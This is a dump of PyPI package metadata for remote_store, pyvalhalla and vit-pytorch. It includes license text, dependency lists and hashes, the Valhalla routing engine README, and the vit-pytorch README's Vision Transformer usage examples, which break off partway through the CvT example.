MIT License Copyright (c) 2026 Harald Alferi Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
api, atomic-writes, azure-blob-storage, file-storage, filesystem, fsspec, object-storage, s3, sftp, storage-abstraction, streaming
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language...
[]
null
null
>=3.10
[]
[]
[]
[ "bump-my-version>=0.28; extra == \"dev\"", "jupyter; extra == \"dev\"", "moto[s3,server]; extra == \"dev\"", "mypy; extra == \"dev\"", "paramiko>=2.2; extra == \"dev\"", "pre-commit; extra == \"dev\"", "pyarrow>=14.0.0; extra == \"dev\"", "pytest; extra == \"dev\"", "pytest-cov; extra == \"dev\"", ...
[]
[]
[]
[ "Documentation, https://remote-store.readthedocs.io/", "Repository, https://github.com/haalfi/remote-store", "Changelog, https://github.com/haalfi/remote-store/blob/master/CHANGELOG.md", "Issues, https://github.com/haalfi/remote-store/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:13:01.349533
remote_store-0.4.3.tar.gz
908,725
aa/7d/eef432c30c52c71a8c28efb27c29970aaa5df32d8d3a839bbcfcd048b89b/remote_store-0.4.3.tar.gz
source
sdist
null
false
2d87cf9eb5e39e17114759bb4a2d665b
cac597befe8213ab30907bebf261b1b715e15b213e4f59cf31cf8959a1a8d116
aa7deef432c30c52c71a8c28efb27c29970aaa5df32d8d3a839bbcfcd048b89b
null
[ "LICENSE" ]
223
2.4
pyvalhalla
3.6.3
High-level bindings to the Valhalla C++ library
██▒ █▓ ▄▄▄ ██▓ ██░ ██ ▄▄▄ ██▓ ██▓ ▄▄▄ ▓██░ █▒▒████▄ ▓██▒ ▓██░ ██▒▒████▄ ▓██▒ ▓██▒ ▒████▄ ▓██ █▒░▒██ ▀█▄ ▒██░ ▒██▀▀██░▒██ ▀█▄ ▒██░ ▒██░ ▒██ ▀█▄ ▒██ █░░░██▄▄▄▄██ ▒██░ ░▓█ ░██ ░██▄▄▄▄██ ▒██░ ▒██░ ░██▄▄▄▄██ ▒▀█░ ▓█ ▓██▒░██████▒░▓█▒░██▓ ▓█ ▓██▒░██████▒░██████▒▓█ ▓██▒ ░ ▐░ ▒▒ ▓▒█░░ ▒░▓ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░░ ▒░▓ ░░ ▒░▓ ░▒▒ ▓▒█░ ░ ░░ ▒ ▒▒ ░░ ░ ▒ ░ ▒ ░▒░ ░ ▒ ▒▒ ░░ ░ ▒ ░░ ░ ▒ ░ ▒ ▒▒ ░ ░░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Valhalla is an open source routing engine and accompanying libraries for use with OpenStreetMap data. Valhalla also includes tools like time+distance matrix computation, isochrones, elevation sampling, map matching and tour optimization (Travelling Salesman). ## Build Status | Linux | macOS & Windows | Code Coverage | Timezone DB | ----- | --------------- | ------------- | ----------- | [![Build Linux](https://github.com/valhalla/valhalla/actions/workflows/linux.yml/badge.svg)](https://github.com/valhalla/valhalla/actions/workflows/linux.yml) | [![Windows & macOS CI](https://github.com/valhalla/valhalla/actions/workflows/osx_win_python_builds.yml/badge.svg)](https://github.com/valhalla/valhalla/actions/workflows/osx_win_python_builds.yml) | [![codecov](https://codecov.io/gh/valhalla/valhalla/branch/master/graph/badge.svg)](https://codecov.io/gh/valhalla/valhalla) | [![timezone_db](https://img.shields.io/badge/tzdb%20version-2025c-blue.svg)](https://github.com/valhalla/valhalla/actions/workflows/publish_tz_db.yml) ## License Valhalla, and all of the projects under the Valhalla organization, use the [MIT License](https://github.com/valhalla/valhalla/blob/master/COPYING). Avatar/logo by [Jordan](https://www.jaykaydraws.com/portfolio). OpenStreetMap data in the `./test/data` is licensed under [ODbL](https://opendatacommons.org/licenses/odbl/) and [copyrighted](https://www.openstreetmap.org/copyright) by OSM contributors. 
Additional information on licenses and other requirements concerning the data sources most frequently used by Valhalla can be found in [the docs](https://valhalla.github.io/valhalla/mjolnir/data_sources/). ## Overview There are several key features that we hope can differentiate the Valhalla project from other routing and network analysis engines. They are: - Open source software, on open source data with a very liberal license. Should allow for transparency in development, encourage contribution and community input, and foster use in other projects. - Tiled hierarchical data structure. Should allow users to have a small memory footprint on memory constrained devices, enable offline routing, provide a means for regional extracts and partial updates. - Dynamic, runtime costing of edges and vertices within the graph via a plugin architecture. Should allow for customization and alternate route generation. - C++ based API. Should allow for cross compilation of the various pieces to enable routing on offline portable devices. - A plugin based narrative and manoeuvre generation architecture. Should allow for generation that is customized either to the administrative area or to the target locale. - Multi-modal and time-based routes. Should allow for mixing auto, pedestrian, bike and public transportation in the same route or setting a time by which one must arrive at a location. ## Demo Server [FOSSGIS e.V.](https://fossgis.de) hosts a demo server which is open to the public and includes a full planet graph with an [open-source web app](https://github.com/gis-ops/valhalla-app) on <https://valhalla.openstreetmap.de>. The HTTP API is accessible on a slightly different subdomain, e.g. <https://valhalla1.openstreetmap.de/isochrone>. Usage of the demo server follows the usual fair-usage policy as OSRM & Nominatim demo servers (somewhat enforced by [rate limits](https://github.com/valhalla/valhalla/discussions/3373#discussioncomment-1644713)). 
## Platform Compatibility Valhalla is fully functional on many Linux and macOS distributions, and is also used on iOS and Android devices. For Windows, not all functionality is fully supported yet. Building the Valhalla library works flawlessly, as well as the following application modules: - `TOOLS`: utilities to query and benchmark various components - `DATA_TOOLS`: utilities to build input data and handle transit - `PYTHON_BINDINGS`: use all actions (route, isochrones, matrix etc) via the Valhalla Python library (needs a full (i.e. development) Python distribution in the `PATH`) ## Organization The Valhalla organization comprises several library modules, each responsible for a different function. The layout of the various modules is as follows: - [Midgard](https://github.com/valhalla/valhalla/tree/master/valhalla/midgard) - Basic geographic and geometric algorithms for use in the various other projects. - [Baldr](https://github.com/valhalla/valhalla/tree/master/valhalla/baldr) - The base data structures for accessing and caching tiled route data. - [Sif](https://github.com/valhalla/valhalla/tree/master/valhalla/sif) - Library used in costing of graph nodes and edges. This can be used as input to `loki` and `thor`. - [Skadi](https://github.com/valhalla/valhalla/tree/master/valhalla/skadi) - Library and service for accessing elevation data. This can be used as input to `mjolnir` or as a standalone service. - [Mjolnir](https://github.com/valhalla/valhalla/tree/master/valhalla/mjolnir) - Tools for turning open data into Valhalla graph tiles. - [Loki](https://github.com/valhalla/valhalla/tree/master/valhalla/loki) - Library used to search graph tiles and correlate input locations to an entity within a tile. This correlated entity (edge or vertex) can be used as input to `thor`. - [Meili](https://github.com/valhalla/valhalla/tree/master/valhalla/meili) - Library used for map-matching.
- [Thor](https://github.com/valhalla/valhalla/tree/master/valhalla/thor) - Library used to generate a path through the graph tile hierarchy. This path and attribution along the path can be used as input to `odin`. - [Odin](https://github.com/valhalla/valhalla/tree/master/valhalla/odin) - Library used to generate manoeuvres and narrative based on a path. This set of directions information can be used as input to `tyr`. - [Tyr](https://github.com/valhalla/valhalla/tree/master/valhalla/tyr) - Service used to handle HTTP requests for a route, communicating with all of the other Valhalla APIs. The service will format output from `odin` and support json (and eventually protocol buffer) output. - [Tools](https://github.com/valhalla/valhalla/tree/master/src) - A set of command line tools that exercise bits of functionality from the library components above and provide the basis for quality testing and performance benchmarking. - [Demos](https://github.com/valhalla/demos) - A set of demos which allows interacting with the service and APIs. ## Documentation Documentation is stored in the `docs/` folder in this GitHub repository. It can be viewed at [valhalla.github.io/valhalla](https://valhalla.github.io/valhalla). ## Installation For more information on binaries, see the [Command Line Tools](#command-line-tools) section below and the [docs](https://valhalla.github.io/valhalla). ### From source If you want to build Valhalla from source, follow the [documentation](https://valhalla.github.io/valhalla/building/). ### With docker [![Test & Publish Docker image](https://github.com/valhalla/valhalla/actions/workflows/docker-build.yml/badge.svg)](https://github.com/orgs/valhalla/packages?repo_name=valhalla) To run Valhalla locally or on your own server, we recommend using one of our [Docker images](https://github.com/orgs/valhalla/packages), see the [README](https://github.com/valhalla/valhalla/blob/master/docker/README.md).
### Via Python bindings [![pyvalhalla version](https://img.shields.io/pypi/v/pyvalhalla?label=pyvalhalla)](https://pypi.org/project/pyvalhalla/) We publish our (very) high-level Python bindings to PyPI with [`pyvalhalla`](https://pypi.org/project/pyvalhalla/). The Python packages don't just contain the Python bindings; they also provide access to the C++ executables, e.g. in the form of `python -m valhalla valhalla_build_tiles -h`. For more details, see the [Python README](https://valhalla.github.io/valhalla/README_python). To install the native C++ executables, one doesn't need root permissions or even a Python installation. Simply download the desired wheel from [PyPI](https://pypi.org/project/pyvalhalla), extract it with e.g. `unzip` and run the included `valhalla/bin/<binary>` directly. ### Via NodeJS bindings [![npm version](https://img.shields.io/npm/v/@valhallajs/valhallajs/latest?label=@valhallajs/valhallajs@latest)](https://www.npmjs.com/package/@valhallajs/valhallajs) [![npm version](https://img.shields.io/npm/v/@valhallajs/valhallajs/weekly?label=@valhallajs/valhallajs@weekly)](https://www.npmjs.com/package/@valhallajs/valhallajs) We provide high-level NodeJS bindings: ```bash npm install @valhallajs/valhallajs ``` For more details, see the [NodeJS README](https://github.com/valhalla/valhalla/blob/master/src/bindings/nodejs/README.md). ## Contributing We :heart: contributions to Valhalla. They could be non-technical, e.g. translations into other languages via [Transifex](https://www.transifex.com/valhalla/valhalla-phrases/locales-en-us-json--transifex/) or documentation improvements, or technical ones like bug fixes or feature implementations. It's important to open an issue before setting out to work on a PR. Ideally, get familiar with our [Contribution guidelines](https://github.com/valhalla/valhalla/blob/master/CONTRIBUTING.md) first.
## Command Line Tools > [!TIP] > Easily install various Valhalla command line tools like `valhalla_build_tiles` or `valhalla_service` with the [Python bindings](https://valhalla.github.io/valhalla/README_python). ### `valhalla_service` aka one-shot mode If you can't (e.g. Windows Server) or don't want to have the full-fledged HTTP API running, you can get (almost) exactly the same behavior with the `valhalla_service` executable in so-called "one-shot" mode. It's simple: just pass the config file, the action (route, isochrone, matrix, etc.) and the stringified JSON request (or alternatively a file containing the request to circumvent shell command length issues): ``` valhalla_service valhalla.json isochrone '{"locations":[{"lat":42.552448,"lon":1.564865}],"costing":"auto","contours":[{"time":10,"color":"ff0000"}], "show_locations":true}' # Alternatively you can pass a file with the same contents valhalla_service valhalla.json isochrone isochrone_request.txt ``` It's important to note that all Valhalla logs for one-shot mode are piped to `stderr`, while the actual JSON response goes to `stdout`. To completely silence the logs, pass `type: ""` to `midgard.logging` in the config file. ### Batch Script Tool - [Batch Run_Route](https://github.com/valhalla/valhalla/blob/master/run_route_scripts/README.md) ## Related projects The following projects are open-source and built to make it easier to use Valhalla and its features: - [**OpenStreetMapSpeeds**](https://github.com/OpenStreetMapSpeeds/): A project conflating open GPS data to improve Valhalla's speed classification. The current JSON is from early 2022 and can be downloaded [here](https://raw.githubusercontent.com/OpenStreetMapSpeeds/schema/master/default_speeds.json) and used by setting the path in the `mjolnir.default_speeds_config` config option. - [**valhalla-operator**](https://github.com/itayankri/valhalla-operator): A k8s operator to deploy and manage Valhalla.
- [**valhalla-app**](https://github.com/gis-ops/valhalla-app): A React based web app for Valhalla, powering <https://valhalla.openstreetmap.de/>. - [**valhalla-qgis-plugin**](https://github.com/gis-ops/valhalla-qgis-plugin): A QGIS plugin for Valhalla, also available in the [official QGIS plugin store](https://plugins.qgis.org/plugins/valhalla/), featuring built-in `valhalla_service` and `valhalla_build_tiles`. - [**routingpy**](https://github.com/gis-ops/routingpy): A Python client for most open-source routing engines, including Valhalla, with a common interface for all engines. Available on [PyPI](https://pypi.org/project/routingpy/). - [**routingjs**](https://github.com/gis-ops/routingjs): A TypeScript client for most open-source routing engines, including Valhalla, with a common interface for all engines. Available as engine-specific packages on [npm](https://www.npmjs.com/package/@routingjs/valhalla). - [**Valhalla_jll.jl**](https://github.com/JuliaBinaryWrappers/Valhalla_jll.jl): Valhalla binaries shipped for Julia. - [**valhalla-go**](https://github.com/pufferffish/valhalla-go): Valhalla Golang bindings via cgo
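When scripting against the one-shot mode described under Command Line Tools, the request JSON can be assembled with the standard library rather than hand-written. A minimal sketch mirroring the isochrone example (coordinate and contour values are copied from the README):

```python
import json

# Same isochrone request as in the one-shot `valhalla_service` example.
# Adjust locations, costing, and contours for your own query.
request = {
    "locations": [{"lat": 42.552448, "lon": 1.564865}],
    "costing": "auto",
    "contours": [{"time": 10, "color": "ff0000"}],
    "show_locations": True,
}

# Pass this string as the third argument to `valhalla_service`,
# or write it to a file to sidestep shell command-length limits.
payload = json.dumps(request)
```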
text/markdown
Nils Nolde, Kevin Kreiser
null
null
null
null
null
[]
[]
null
null
>=3.9.0
[]
[]
[]
[ "numpy<3.0.0,>=2.0.0; extra == \"typing\"" ]
[]
[]
[]
[ "Homepage, https://github.com/valhalla/valhalla", "Documentation, https://valhalla.github.io/valhalla/", "Repository, https://github.com/valhalla/valhalla", "Issues, https://github.com/valhalla/valhalla/issues", "Changelog, https://github.com/valhalla/valhalla/blob/master/CHANGELOG.md" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:12:40.575129
pyvalhalla-3.6.3.tar.gz
35,746,107
04/67/f1fb5cb3df1fa19555acde4a99e8a7c97333fc2aa8e4077fdb191ddb0b60/pyvalhalla-3.6.3.tar.gz
source
sdist
null
false
2684faa29bde0e72bf51cb47d243af41
daee61451072739414026ce4b6b642fc534dea7bbc792eb68a9dd0c3a5d78604
0467f1fb5cb3df1fa19555acde4a99e8a7c97333fc2aa8e4077fdb191ddb0b60
MIT
[ "COPYING" ]
464
2.4
vit-pytorch
1.18.0
Vision Transformer (ViT) - Pytorch
<img src="./images/vit.gif" width="500px"></img> ## Table of Contents - [Vision Transformer - Pytorch](#vision-transformer---pytorch) - [Install](#install) - [Usage](#usage) - [Parameters](#parameters) - [Simple ViT](#simple-vit) - [NaViT](#navit) - [Distillation](#distillation) - [Deep ViT](#deep-vit) - [CaiT](#cait) - [Token-to-Token ViT](#token-to-token-vit) - [CCT](#cct) - [Cross ViT](#cross-vit) - [PiT](#pit) - [LeViT](#levit) - [CvT](#cvt) - [Twins SVT](#twins-svt) - [CrossFormer](#crossformer) - [RegionViT](#regionvit) - [ScalableViT](#scalablevit) - [SepViT](#sepvit) - [MaxViT](#maxvit) - [NesT](#nest) - [MobileViT](#mobilevit) - [XCiT](#xcit) - [Masked Autoencoder](#masked-autoencoder) - [Simple Masked Image Modeling](#simple-masked-image-modeling) - [Masked Patch Prediction](#masked-patch-prediction) - [Masked Position Prediction](#masked-position-prediction) - [Adaptive Token Sampling](#adaptive-token-sampling) - [Patch Merger](#patch-merger) - [Vision Transformer for Small Datasets](#vision-transformer-for-small-datasets) - [3D Vit](#3d-vit) - [ViVit](#vivit) - [Parallel ViT](#parallel-vit) - [Learnable Memory ViT](#learnable-memory-vit) - [Dino](#dino) - [EsViT](#esvit) - [Accessing Attention](#accessing-attention) - [Research Ideas](#research-ideas) * [Efficient Attention](#efficient-attention) * [Combining with other Transformer improvements](#combining-with-other-transformer-improvements) - [FAQ](#faq) - [Resources](#resources) - [Citations](#citations) ## Vision Transformer - Pytorch Implementation of <a href="https://openreview.net/pdf?id=YicbFdNTTy">Vision Transformer</a>, a simple way to achieve SOTA in vision classification with only a single transformer encoder, in Pytorch. Significance is further explained in <a href="https://www.youtube.com/watch?v=TrdevFK_am4">Yannic Kilcher's</a> video. 
There's really not much to code here, but may as well lay it out for everyone so we expedite the [attention](https://www.youtube.com/watch?v=eMlx5fFNoYc) revolution. For a Pytorch implementation with pretrained models, please see Ross Wightman's repository <a href="https://github.com/rwightman/pytorch-image-models">here</a>. The official Jax repository is <a href="https://github.com/google-research/vision_transformer">here</a>. A TensorFlow 2 translation also exists <a href="https://github.com/taki0112/vit-tensorflow">here</a>, created by research scientist <a href="https://github.com/taki0112">Junho Kim</a>! 🙏 <a href="https://github.com/conceptofmind/vit-flax">Flax translation</a> by <a href="https://github.com/conceptofmind">Enrico Shippole</a>! ## Install ```bash $ pip install vit-pytorch ``` ## Usage ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Parameters - `image_size`: int. Image size. If you have rectangular images, make sure your image size is the maximum of the width and height. - `patch_size`: int. Size of patches. `image_size` must be divisible by `patch_size`. The number of patches is `n = (image_size // patch_size) ** 2`, and `n` **must be greater than 16**. - `num_classes`: int. Number of classes to classify. - `dim`: int. Last dimension of output tensor after linear transformation `nn.Linear(..., dim)`. - `depth`: int. Number of Transformer blocks. - `heads`: int. Number of heads in Multi-head Attention layer. - `mlp_dim`: int. Dimension of the MLP (FeedForward) layer. - `channels`: int, default `3`. Number of image channels. - `dropout`: float between `[0, 1]`, default `0.`. Dropout rate. - `emb_dropout`: float between `[0, 1]`, default `0`. Embedding dropout rate.
- `pool`: string, either `cls` token pooling or `mean` pooling ## Simple ViT <a href="https://arxiv.org/abs/2205.01580">An update</a> from some of the same authors of the original paper proposes simplifications to `ViT` that allow it to train faster and better. These simplifications include 2d sinusoidal positional embedding, global average pooling (no CLS token), no dropout, batch sizes of 1024 rather than 4096, and the use of RandAugment and MixUp augmentations. They also show that a simple linear layer at the end is not significantly worse than the original MLP head. You can use it by importing `SimpleViT` as shown below ```python import torch from vit_pytorch import SimpleViT v = SimpleViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## NaViT <img src="./images/navit.png" width="450px"></img> <a href="https://arxiv.org/abs/2307.06304">This paper</a> proposes to leverage the flexibility of attention and masking for variable-length sequences to train on images of multiple resolutions, packed into a single batch. They demonstrate much faster training and improved accuracies, with the only cost being extra complexity in the architecture and dataloading. They use factorized 2d positional encodings, token dropping, as well as query-key normalization.
You can use it as follows ```python import torch from vit_pytorch.na_vit import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, token_dropout_prob = 0.1 # token dropout of 10% (keep 90% of tokens) ) # 5 images of different resolutions - List[List[Tensor]] # for now, you'll have to correctly place images in the same batch element so as not to exceed the maximum allowed sequence length for self-attention w/ masking images = [ [torch.randn(3, 256, 256), torch.randn(3, 128, 128)], [torch.randn(3, 128, 256), torch.randn(3, 256, 128)], [torch.randn(3, 64, 256)] ] preds = v(images) # (5, 1000) - 5, because 5 images of different resolution above ``` Or, if you would rather have the framework automatically group the images into variable-length sequences that do not exceed a certain max length ```python images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v( images, group_images = True, group_max_seq_len = 64 ) # (5, 1000) ``` Finally, if you would like to make use of a flavor of NaViT using <a href="https://pytorch.org/tutorials/prototype/nestedtensor.html">nested tensors</a> (which will omit a lot of the masking and padding altogether), make sure you are on PyTorch version `2.5` and import as follows ```python import torch from vit_pytorch.na_vit_nested_tensor import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 images of different resolutions - List[Tensor] images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v(images) assert preds.shape == (5, 1000) ``` ## Distillation <img src="./images/distill.png" width="300px"></img> A recent <a
href="https://arxiv.org/abs/2012.12877">paper</a> has shown that use of a distillation token for distilling knowledge from convolutional nets to vision transformers can yield small and efficient vision transformers. This repository offers the means to do distillation easily. For example, distilling from ResNet-50 (or any teacher) to a vision transformer ```python import torch from torchvision.models import resnet50 from vit_pytorch.distill import DistillableViT, DistillWrapper teacher = resnet50(pretrained = True) v = DistillableViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) distiller = DistillWrapper( student = v, teacher = teacher, temperature = 3, # temperature of distillation alpha = 0.5, # trade-off between main loss and distillation loss hard = False # whether to use soft or hard distillation ) img = torch.randn(2, 3, 256, 256) labels = torch.randint(0, 1000, (2,)) loss = distiller(img, labels) loss.backward() # after lots of training above ... pred = v(img) # (2, 1000) ``` The `DistillableViT` class is identical to `ViT` except for how the forward pass is handled, so you should be able to load the parameters back to `ViT` after you have completed distillation training. You can also use the handy `.to_vit` method on the `DistillableViT` instance to get back a `ViT` instance. ```python v = v.to_vit() type(v) # <class 'vit_pytorch.vit_pytorch.ViT'> ``` ## Deep ViT This <a href="https://arxiv.org/abs/2103.11886">paper</a> notes that ViT struggles to attend at greater depths (past 12 layers), and suggests mixing the attention of each head post-softmax as a solution, dubbed Re-attention. The results line up with the <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a> paper from NLP.
You can use it as follows

```python
import torch
from vit_pytorch.deepvit import DeepViT

v = DeepViT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(1, 3, 256, 256)

preds = v(img) # (1, 1000)
```

## CaiT

<a href="https://arxiv.org/abs/2103.17239">This paper</a> also notes difficulty in training vision transformers at greater depths and proposes two solutions. First it proposes to do per-channel multiplication of the output of the residual block. Second, it proposes to have the patches attend to one another, and only allow the CLS token to attend to the patches in the last few layers.

They also add <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a>, noting improvements.

You can use this scheme as follows

```python
import torch
from vit_pytorch.cait import CaiT

v = CaiT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 12,           # depth of transformer for patch to patch attention only
    cls_depth = 2,        # depth of cross attention of CLS tokens to patch
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1,
    layer_dropout = 0.05  # randomly dropout 5% of the layers
)

img = torch.randn(1, 3, 256, 256)

preds = v(img) # (1, 1000)
```

## Token-to-Token ViT

<img src="./images/t2t.png" width="400px"></img>

<a href="https://arxiv.org/abs/2101.11986">This paper</a> proposes that the first couple layers should downsample the image sequence by unfolding, leading to overlapping image data in each token as shown in the figure above. You can use this variant of the `ViT` as follows.
```python
import torch
from vit_pytorch.t2t import T2TViT

v = T2TViT(
    dim = 512,
    image_size = 224,
    depth = 5,
    heads = 8,
    mlp_dim = 512,
    num_classes = 1000,
    t2t_layers = ((7, 4), (3, 2), (3, 2)) # tuples of the kernel size and stride of each consecutive layer of the initial token-to-token module
)

img = torch.randn(1, 3, 224, 224)

preds = v(img) # (1, 1000)
```

## CCT

<img src="https://raw.githubusercontent.com/SHI-Labs/Compact-Transformers/main/images/model_sym.png" width="400px"></img>

<a href="https://arxiv.org/abs/2104.05704">CCT</a> proposes compact transformers by using convolutions instead of patching and performing sequence pooling. This allows CCT to have high accuracy and a low number of parameters.

You can use this with two methods

```python
import torch
from vit_pytorch.cct import CCT

cct = CCT(
    img_size = (224, 448),
    embedding_dim = 384,
    n_conv_layers = 2,
    kernel_size = 7,
    stride = 2,
    padding = 3,
    pooling_kernel_size = 3,
    pooling_stride = 2,
    pooling_padding = 1,
    num_layers = 14,
    num_heads = 6,
    mlp_ratio = 3.,
    num_classes = 1000,
    positional_embedding = 'learnable' # ['sine', 'learnable', 'none']
)

img = torch.randn(1, 3, 224, 448)
pred = cct(img) # (1, 1000)
```

Alternatively you can use one of several pre-defined models `[2, 4, 6, 7, 8, 14, 16]` which pre-define the number of layers, number of attention heads, the mlp ratio, and the embedding dimension.

```python
import torch
from vit_pytorch.cct import cct_14

cct = cct_14(
    img_size = 224,
    n_conv_layers = 1,
    kernel_size = 7,
    stride = 2,
    padding = 3,
    pooling_kernel_size = 3,
    pooling_stride = 2,
    pooling_padding = 1,
    num_classes = 1000,
    positional_embedding = 'learnable' # ['sine', 'learnable', 'none']
)
```

The <a href="https://github.com/SHI-Labs/Compact-Transformers">Official Repository</a> includes links to pretrained model checkpoints.
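As a sanity check on the convolutional tokenizer settings, the sequence length seen by the transformer can be derived with the standard conv/pool output-size formula. The sketch below is an independent back-of-the-envelope calculation (not code from `vit_pytorch`), applying the example's kernel/stride/padding values per spatial dimension of a square 224-pixel input with two conv layers:

```python
def conv_out(size: int, kernel: int, stride: int, padding: int) -> int:
    """Standard output-size formula for a convolution or pooling layer."""
    return (size + 2 * padding - kernel) // stride + 1

size = 224
for _ in range(2):  # n_conv_layers = 2
    size = conv_out(size, kernel=7, stride=2, padding=3)  # conv (kernel_size, stride, padding)
    size = conv_out(size, kernel=3, stride=2, padding=1)  # maxpool (pooling_* settings)

print(size, size * size)  # 14 196 -> the transformer attends over 196 tokens
```

This is why CCT can run a 14-layer transformer cheaply: the tokenizer has already reduced a 224x224 image to a 14x14 grid of tokens.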
## Cross ViT

<img src="./images/cross_vit.png" width="400px"></img>

<a href="https://arxiv.org/abs/2103.14899">This paper</a> proposes to have two vision transformers processing the image at different scales, cross attending to one another every so often. They show improvements on top of the base vision transformer.

```python
import torch
from vit_pytorch.cross_vit import CrossViT

v = CrossViT(
    image_size = 256,
    num_classes = 1000,
    depth = 4,              # number of multi-scale encoding blocks
    sm_dim = 192,           # high res dimension
    sm_patch_size = 16,     # high res patch size (should be smaller than lg_patch_size)
    sm_enc_depth = 2,       # high res depth
    sm_enc_heads = 8,       # high res heads
    sm_enc_mlp_dim = 2048,  # high res feedforward dimension
    lg_dim = 384,           # low res dimension
    lg_patch_size = 64,     # low res patch size
    lg_enc_depth = 3,       # low res depth
    lg_enc_heads = 8,       # low res heads
    lg_enc_mlp_dim = 2048,  # low res feedforward dimension
    cross_attn_depth = 2,   # cross attention rounds
    cross_attn_heads = 8,   # cross attention heads
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(1, 3, 256, 256)

pred = v(img) # (1, 1000)
```

## PiT

<img src="./images/pit.png" width="400px"></img>

<a href="https://arxiv.org/abs/2103.16302">This paper</a> proposes to downsample the tokens through a pooling procedure using depth-wise convolutions.
```python
import torch
from vit_pytorch.pit import PiT

v = PiT(
    image_size = 224,
    patch_size = 14,
    dim = 256,
    num_classes = 1000,
    depth = (3, 3, 3),  # list of depths, indicating the number of rounds of each stage before a downsample
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(1, 3, 224, 224)

preds = v(img) # (1, 1000)
```

## LeViT

<img src="./images/levit.png" width="300px"></img>

<a href="https://arxiv.org/abs/2104.01136">This paper</a> proposes a number of changes, including (1) convolutional embedding instead of patch-wise projection, (2) downsampling in stages, (3) extra non-linearity in attention, (4) 2d relative positional biases instead of an initial absolute positional bias, and (5) batchnorm in place of layernorm.

<a href="https://github.com/facebookresearch/LeViT">Official repository</a>

```python
import torch
from vit_pytorch.levit import LeViT

levit = LeViT(
    image_size = 224,
    num_classes = 1000,
    stages = 3,             # number of stages
    dim = (256, 384, 512),  # dimensions at each stage
    depth = 4,              # transformer of depth 4 at each stage
    heads = (4, 6, 8),      # heads at each stage
    mlp_mult = 2,
    dropout = 0.1
)

img = torch.randn(1, 3, 224, 224)

levit(img) # (1, 1000)
```

## CvT

<img src="./images/cvt.png" width="400px"></img>

<a href="https://arxiv.org/abs/2103.15808">This paper</a> proposes mixing convolutions and attention. Specifically, convolutions are used to embed and downsample the image / feature map in three stages. Depthwise convolution is also used to project the queries, keys, and values for attention.
```python
import torch
from vit_pytorch.cvt import CvT

v = CvT(
    num_classes = 1000,
    s1_emb_dim = 64,        # stage 1 - dimension
    s1_emb_kernel = 7,      # stage 1 - conv kernel
    s1_emb_stride = 4,      # stage 1 - conv stride
    s1_proj_kernel = 3,     # stage 1 - attention ds-conv kernel size
    s1_kv_proj_stride = 2,  # stage 1 - attention key / value projection stride
    s1_heads = 1,           # stage 1 - heads
    s1_depth = 1,           # stage 1 - depth
    s1_mlp_mult = 4,        # stage 1 - feedforward expansion factor
    s2_emb_dim = 192,       # stage 2 - (same as above)
    s2_emb_kernel = 3,
    s2_emb_stride = 2,
    s2_proj_kernel = 3,
    s2_kv_proj_stride = 2,
    s2_heads = 3,
    s2_depth = 2,
    s2_mlp_mult = 4,
    s3_emb_dim = 384,       # stage 3 - (same as above)
    s3_emb_kernel = 3,
    s3_emb_stride = 2,
    s3_proj_kernel = 3,
    s3_kv_proj_stride = 2,
    s3_heads = 4,
    s3_depth = 10,
    s3_mlp_mult = 4,
    dropout = 0.
)

img = torch.randn(1, 3, 224, 224)

pred = v(img) # (1, 1000)
